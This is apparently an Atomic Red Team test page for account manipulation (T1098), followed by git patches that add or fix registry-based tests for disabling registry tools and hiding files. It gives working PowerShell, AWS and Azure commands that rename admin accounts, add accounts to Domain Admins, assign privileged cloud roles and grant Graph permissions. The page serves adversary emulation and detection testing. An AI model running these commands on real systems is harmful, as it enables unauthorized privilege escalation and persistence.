Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.
+ +## Atomic Tests + +- [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate) + +- [Atomic Test #2 - Domain Account and Group Manipulate](#atomic-test-2---domain-account-and-group-manipulate) + +- [Atomic Test #3 - AWS - Create a group and add a user to that group](#atomic-test-3---aws---create-a-group-and-add-a-user-to-that-group) + +- [Atomic Test #4 - Azure - adding user to Azure AD role](#atomic-test-4---azure---adding-user-to-azure-ad-role) + +- [Atomic Test #5 - Azure - adding service principal to Azure AD role](#atomic-test-5---azure---adding-service-principal-to-azure-ad-role) + +- [Atomic Test #6 - Azure - adding user to Azure role in subscription](#atomic-test-6---azure---adding-user-to-azure-role-in-subscription) + +- [Atomic Test #7 - Azure - adding service principal to Azure role in subscription](#atomic-test-7---azure---adding-service-principal-to-azure-role-in-subscription) + +- [Atomic Test #8 - AzureAD - adding permission to application](#atomic-test-8---azuread---adding-permission-to-application) + + +
+ +## Atomic Test #1 - Admin Account Manipulate +Manipulate Admin Account Name + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +$x = Get-Random -Minimum 2 -Maximum 9999 +$y = Get-Random -Minimum 2 -Maximum 9999 +$z = Get-Random -Minimum 2 -Maximum 9999 +$w = Get-Random -Minimum 2 -Maximum 9999 +Write-Host HaHa_$x$y$z + +$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name + +foreach($member in $fmm) { + if($member -like "*Administrator*") { + $account = $member.Name -replace ".+\\\","" # strip computername\ + $originalDescription = (Get-LocalUser -Name $account).Description + Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description + Rename-LocalUser -Name $account -NewName "HaHa_$x$y$z" # Required due to length limitation + Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME + } + } +``` + +#### Cleanup Commands: +```powershell +$list = Get-LocalUser |?{$_.Description -like "atr:*"} +foreach($u in $list) { + $u.Description -match "atr:(?[^;]+);(?.*)" + Set-LocalUser -Name $u.Name -Description $Matches.Description + Rename-LocalUser -Name $u.Name -NewName $Matches.Name + Write-Host "Successfully Reverted Account $($u.Name) to $($Matches.Name) on " $Env:COMPUTERNAME +} +``` + + + + + +
+
+ +## Atomic Test #2 - Domain Account and Group Manipulate +Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). + +The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively, +you need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to +create the user and alter the group. Automatic installation of the dependency requires an elevated session, +and is unlikely to work with Powershell Core (untested). + +If you consider running this test against a production Active Directory, the good practise is to create a dedicated +service account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated +as group manager of the target group. + +Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }` + +**Supported Platforms:** Windows + + +**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| account_prefix | Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on +a match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful. | String | atr-| +| group | Name of the group to alter | String | Domain Admins| +| create_args | Additional string appended to New-ADUser call | String | | + + +#### Attack Commands: Run with `powershell`! 
+ + +```powershell +$x = Get-Random -Minimum 2 -Maximum 99 +$y = Get-Random -Minimum 2 -Maximum 99 +$z = Get-Random -Minimum 2 -Maximum 99 +$w = Get-Random -Minimum 2 -Maximum 99 + +Import-Module ActiveDirectory +$account = "#{account_prefix}-$x$y$z" +New-ADUser -Name $account -GivenName "Test" -DisplayName $account -SamAccountName $account -Surname $account -Enabled:$False #{create_args} +Add-ADGroupMember "#{group}" $account +``` + +#### Cleanup Commands: +```powershell +Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: PS Module ActiveDirectory +##### Check Prereq Commands: +```powershell +Try { + Import-Module ActiveDirectory -ErrorAction Stop | Out-Null + exit 0 +} +Catch { + exit 1 +} +``` +##### Get Prereq Commands: +```powershell +if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) { + Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online +} else { + Install-WindowsFeature RSAT-AD-PowerShell +} +``` + + + + +
+
+ +## Atomic Test #3 - AWS - Create a group and add a user to that group +Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f110a31122 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Name of the AWS group to create | String | atomicredteam| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws iam create-group --group-name #{username} +aws iam add-user-to-group --user-name #{username} --group-name #{username} +``` + +#### Cleanup Commands: +```sh +aws iam remove-user-from-group --user-name #{username} --group-name #{username} +aws iam delete-group --group-name #{username} +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Check if the user exists, we can only add a user to a group if the user exists. +##### Check Prereq Commands: +```sh +aws iam list-users | grep #{username} +``` +##### Get Prereq Commands: +```sh +echo Please run atomic test T1136.003, before running this atomic test +``` + + + + +
+
+ +## Atomic Test #4 - Azure - adding user to Azure AD role +The adversarie want to add user to some Azure AD role. Threat actor +may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, +Privileged authentication administrator (this role can reset Global Administrator password!). +By default, the role Global Reader is assigned to service principal in this test. + +The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD. + +Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type. + +**Supported Platforms:** Azure-ad + + +**auto_generated_guid:** 0e65ae27-5385-46b4-98ac-607a8ee82261 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure AD username | String | jonh@contoso.com| +| password | Azure AD password | String | p4sswd| +| user_principal_name | Name of the targeted user (user principal) | String | SuperUser| +| role_name | Name of the targed Azure AD role | String | Global Reader| + + +#### Attack Commands: Run with `powershell`! 
+ + +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"} +if ($user -eq $null) { Write-Warning "User not found"; exit } +$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"} +if ($role -eq $null) { Write-Warning "Role not found"; exit } +Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId +Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role" +``` + +#### Cleanup Commands: +```powershell +Import-Module -Name AzureAD -ErrorAction Ignore +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential -ErrorAction Ignore + +$user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"} +if ($user -eq $null) { Write-Warning "User not found"; exit } +$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"} +if ($role -eq $null) { Write-Warning "Role not found"; exit } + +Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId +Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role" +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: AzureAD module must be installed. +##### Check Prereq Commands: +```powershell +try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + + + + +
+
+ +## Atomic Test #5 - Azure - adding service principal to Azure AD role +The adversarie want to add service principal to some Azure AD role. Threat actor +may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, +Privileged authentication administrator (this role can reset Global Administrator password!). +By default, the role Global Reader is assigned to service principal in this test. + +The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD. + +Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type. + +**Supported Platforms:** Azure-ad + + +**auto_generated_guid:** 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure AD username | String | jonh@contoso.com| +| password | Azure AD password | String | p4sswd| +| service_principal_name | Name of the service principal | String | SuperSP| +| role_name | Name of the targed Azure AD role | String | Global Reader| + + +#### Attack Commands: Run with `powershell`! 
+ + +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"} +if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } +$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"} +if ($role -eq $null) { Write-Warning "Role not found"; exit } +Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId +Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)" +``` + +#### Cleanup Commands: +```powershell +Import-Module -Name AzureAD -ErrorAction Ignore +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential -ErrorAction Ignore + +$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"} +if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } +$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"} +if ($role -eq $null) { Write-Warning "Role not found"; exit } + +Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId +Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role" +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: AzureAD module must be installed. +##### Check Prereq Commands: +```powershell +try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + + + + +
+
+ +## Atomic Test #6 - Azure - adding user to Azure role in subscription +The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor +may be interested primarily in highly privileged roles, e.g. Owner, Contributor. +By default, the role Reader is assigned to user in this test. + +New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group. + +The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write +(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All +and Microsoft Graph Directory.Read.All permissions. + +Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs. + +**Supported Platforms:** Iaas:azure + + +**auto_generated_guid:** 1a94b3fc-b080-450a-b3d8-6d9b57b472ea + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure AD username | String | jonh@contoso.com| +| password | Azure AD password | String | p4sswd| +| user_principal_name | Name of the targeted user (user principal) | String | SuperUser| +| role_name | Name of the targed Azure role | String | Reader| +| subscription | Name of the targed subscription | String | Azure subscription 1| + + +#### Attack Commands: Run with `powershell`! 
+ + +```powershell +Import-Module -Name Az.Resources +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzAccount -Credential $Credential + +$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"} +if ($user -eq $null) { Write-Warning "User not found"; exit } +$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} +if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } +$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"} +if ($role -eq $null) { Write-Warning "Role not found"; exit } + +New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription +Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)" +``` + +#### Cleanup Commands: +```powershell +Import-Module -Name AzureAD -ErrorAction Ignore +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzAccount -Credential $Credential -ErrorAction Ignore + +$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"} +if ($user -eq $null) { Write-Warning "User not found"; exit } +$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} +if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } +$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"} +if ($role -eq $null) { Write-Warning "Role not found"; exit } + +Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription +Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)" +``` + + + +#### 
Dependencies: Run with `powershell`! +##### Description: Az.Resources module must be installed. +##### Check Prereq Commands: +```powershell +try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name Az.Resources -Force +``` + + + + +
+
+ +## Atomic Test #7 - Azure - adding service principal to Azure role in subscription +The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor +may be interested primarily in highly privileged roles, e.g. Owner, Contributor. +By default, the role Reader is assigned to service principal in this test. + +New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group. + +The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write +(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All +and Microsoft Graph Directory.Read.All permissions. + +Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs. + +**Supported Platforms:** Iaas:azure + + +**auto_generated_guid:** c8f4bc29-a151-48da-b3be-4680af56f404 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure AD username | String | jonh@contoso.com| +| password | Azure AD password | String | p4sswd| +| service_principal_name | Name of the service principal | String | SuperSP| +| role_name | Name of the targed Azure role | String | Reader| +| subscription | Name of the targed subscription | String | Azure subscription 1| + + +#### Attack Commands: Run with `powershell`! 
+ + +```powershell +Import-Module -Name Az.Resources +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzAccount -Credential $Credential + +$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"} +if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } +$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} +if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } +$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"} +if ($role -eq $null) { Write-Warning "Role not found"; exit } + +New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription +Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)" +``` + +#### Cleanup Commands: +```powershell +Import-Module -Name AzureAD -ErrorAction Ignore +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzAccount -Credential $Credential -ErrorAction Ignore + +$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"} +if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit } +$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} +if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit } +$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"} +if ($role -eq $null) { Write-Warning "Role not found"; exit } + +Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription +Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in 
subscriptions $($subscriptions.Name)" +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Az.Resources module must be installed. +##### Check Prereq Commands: +```powershell +try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name Az.Resources -Force +``` + + + + +
+
+ +## Atomic Test #8 - AzureAD - adding permission to application +The adversarie want to add permission to new created application. Application could be then use for persistence or for further operation in the attacked infrastructure. Permissions like AppRoleAssignment.ReadWrite.All or RoleManagement.ReadWrite.Directory in particular can be a valuable target for a threat actor. +You can use Get-AzureADApplication instead New-AzureADServicePrincipal to use an existing application. +The DirectoryRecommendations.Read.All permissions have been selected as the default + +The account you use to run the PowerShell command should have Global Administrator/Application Administrator/Cloud Application Administrator role in your Azure AD. + +Detection hint - check Operation Name "Add app role assignment to service principal" in subscriptions Activity Logs. +You can also take a look at the materials: +https://learnsentinel.blog/2022/01/04/azuread-privesc-sentinel/ +https://github.com/reprise99/Sentinel-Queries +https://docs.google.com/presentation/d/1AWx1w0Xcq8ENvOmSjAJswEgEio-il09QWZlGg9PbHqE/edit#slide=id.g10460eb209c_0_2766 +https://gist.github.com/andyrobbins/7c3dd62e6ed8678c97df9565ff3523fb + +**Supported Platforms:** Azure-ad + + +**auto_generated_guid:** 94ea9cc3-81f9-4111-8dde-3fb54f36af4b + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure AD username | String | jonh@contoso.com| +| password | Azure AD password | String | p4sswd| +| application_name | Name of the targed application | String | test_app| +| application_permission | Permission from Microsoft Graph Resource API that will be add to application | String | DirectoryRecommendations.Read.All| + + +#### Attack Commands: Run with `powershell`! 
+ + +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$aadApplication = New-AzureADApplication -DisplayName "#{application_name}" +$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId +#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"} + +#Get Service Principal of Microsoft Graph Resource API +$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq "Microsoft Graph"} + +#Initialize RequiredResourceAccess for Microsoft Graph Resource API +$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess +$requiredGraphAccess.ResourceAppId = $graphSP.AppId +$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess] + +#Set Application Permissions +$ApplicationPermissions = @('#{application_permission}') + +$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions} +if($reqPermission) +{ +$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess +$resourceAccess.Type = "Role" +$resourceAccess.Id = $reqPermission.Id +#Add required app permission +$requiredGraphAccess.ResourceAccess.Add($resourceAccess) +} +else +{ +Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red +} + +#Add required resource accesses +$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess] +$requiredResourcesAccess.Add($requiredGraphAccess) + +#Set permissions in existing Azure AD App +Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess + +$servicePrincipal = 
Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId} + +New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id +``` + +#### Cleanup Commands: +```powershell +Import-Module -Name AzureAD +$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force +$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword +Connect-AzureAD -Credential $Credential + +$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq "#{application_name}"} +Remove-AzureADApplication -ObjectId $aadApplication.ObjectId +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: AzureAD module must be installed. +##### Check Prereq Commands: +```powershell +try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + + + + +
From 3e65326cb9ff33a4cf186098c58194fa77d6047a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 17 Mar 2022 17:18:06 +0100 Subject: [PATCH 61/83] Fix reg cleanup T1112 Test 9 (#1815) * Fix reg cleanup * ignore errors Co-authored-by: Carrie Roberts
--- atomics/T1112/T1112.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 1e74ca0f..aed17b49 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -167,7 +167,7 @@ atomic_tests:
 command: |
 reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /t REG_DWORD /d 1 /f
 cleanup_command: |
- reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f >nul 2>&1
+ powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore
 name: command_prompt
 elevation_required: true
 - name: Disable Windows CMD application
From 1b6204cc230bfb8b210e32e7fa824b96cce77a2a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 17 Mar 2022 16:18:52 +0000 Subject: [PATCH 62/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
--- atomics/Indexes/index.yaml | 4 ++-- atomics/T1112/T1112.md | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 8754ec81..91e8fe9c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
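Review bot: The new cleanup_command swaps reg.exe for a PowerShell Remove-ItemProperty without recording why, and nothing in the test definition explains it; presumably the old `reg delete` could never undo the attack because reg.exe itself honours DisableRegistryTools once the value is set, which is worth stating in the test's `description` (outside this hunk) so a later edit does not "simplify" the cleanup back to reg.exe. Separately, `-ErrorAction Ignore` hides every failure, including the value still being present after cleanup, and a leftover DisableRegistryTools=1 leaves the host unable to use registry tools; consider noting in the description that operators should confirm the value is gone, or appending a check such as `if (Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore) { Write-Warning 'DisableRegistryTools still set' }` to the same line.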
@@ -31815,8 +31815,8 @@ defense-evasion: /v DisableRegistryTools /t REG_DWORD /d 1 /f ' - cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system - /v DisableRegistryTools /f >nul 2>&1 + cleanup_command: 'powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" + -Name DisableRegistryTools -ErrorAction Ignore ' name: command_prompt
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 95ff2ab5..e4526dd0 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -406,7 +406,7 @@ reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\sys #### Cleanup Commands: ```cmd -reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system /v DisableRegistryTools /f >nul 2>&1 +powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system" -Name DisableRegistryTools -ErrorAction Ignore ```
From 8d9cfa1fe54a9e6d6e2dcc15a7a92176a5b76319 Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Thu, 17 Mar 2022 17:23:00 +0100 Subject: [PATCH 63/83] Hide files through registry (#1816) * Update T1112.yaml * Update T1112.yaml * typos * Update T1564.001.yaml * Update T1564.001.yaml * typo Co-authored-by: Carrie Roberts
--- atomics/T1564.001/T1564.001.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+)
diff --git a/atomics/T1564.001/T1564.001.yaml b/atomics/T1564.001/T1564.001.yaml
index 7d750c7f..2abeae0e 100644
--- a/atomics/T1564.001/T1564.001.yaml
+++ b/atomics/T1564.001/T1564.001.yaml
@@ -119,3 +119,19 @@ atomic_tests:
 cleanup_command: |
 defaults write com.apple.finder AppleShowAllFiles NO
 name: sh
+- name: Hide Files Through Registry
+ auto_generated_guid: f650456b-bd49-4bc1-ae9d-271b5b9581e7
+ description: |
+ Disable Show Hidden files switch in registry. This technique was abused by several malware to hide their files from normal user.
+ See how this trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
+ reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
+ cleanup_command: |
+ reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /f >nul 2>&1
+ reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
From 3eadddf970a05f19fef166ad52825fa691ee6821 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 17 Mar 2022 16:23:41 +0000 Subject: [PATCH 64/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
--- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+)
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index acd113e5..834a6cd3 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -929,3 +929,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e 7f037590-b4c6-4f13-b3cc-e424c5ab8ade 9dc7767b-30c1-4cc4-b999-50cab5e27891 94ea9cc3-81f9-4111-8dde-3fb54f36af4b +f650456b-bd49-4bc1-ae9d-271b5b9581e7
From 288683be91e0f44883d8b03f1eda853e21930bd9 Mon Sep 17 00:00:00 2001
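Review bot: The cleanup_command of the new "Hide Files Through Registry" test deletes the ShowSuperHidden and Hidden values outright instead of restoring what was there, so on a host where either value already existed under that HKLM Explorer\Advanced key the test leaves the machine permanently changed. A cheap fix is to snapshot the key first, e.g. `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" "%TEMP%\atr_t1564_001_advanced.reg" /y` as the first line of command, and `reg import "%TEMP%\atr_t1564_001_advanced.reg" >nul 2>&1` after the two deletes in cleanup_command (the file name is a constructed placeholder), so pre-existing data comes back while values the test introduced stay deleted. The description also says it disables the "Show Hidden files" switch, but the values are written under HKLM rather than the per-user HKCU Explorer\Advanced key where that switch normally lives; whether the HKLM copy actually changes Explorer's behaviour for the logged-in user is worth confirming and stating in the description, since the generated index and docs repeat it verbatim.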
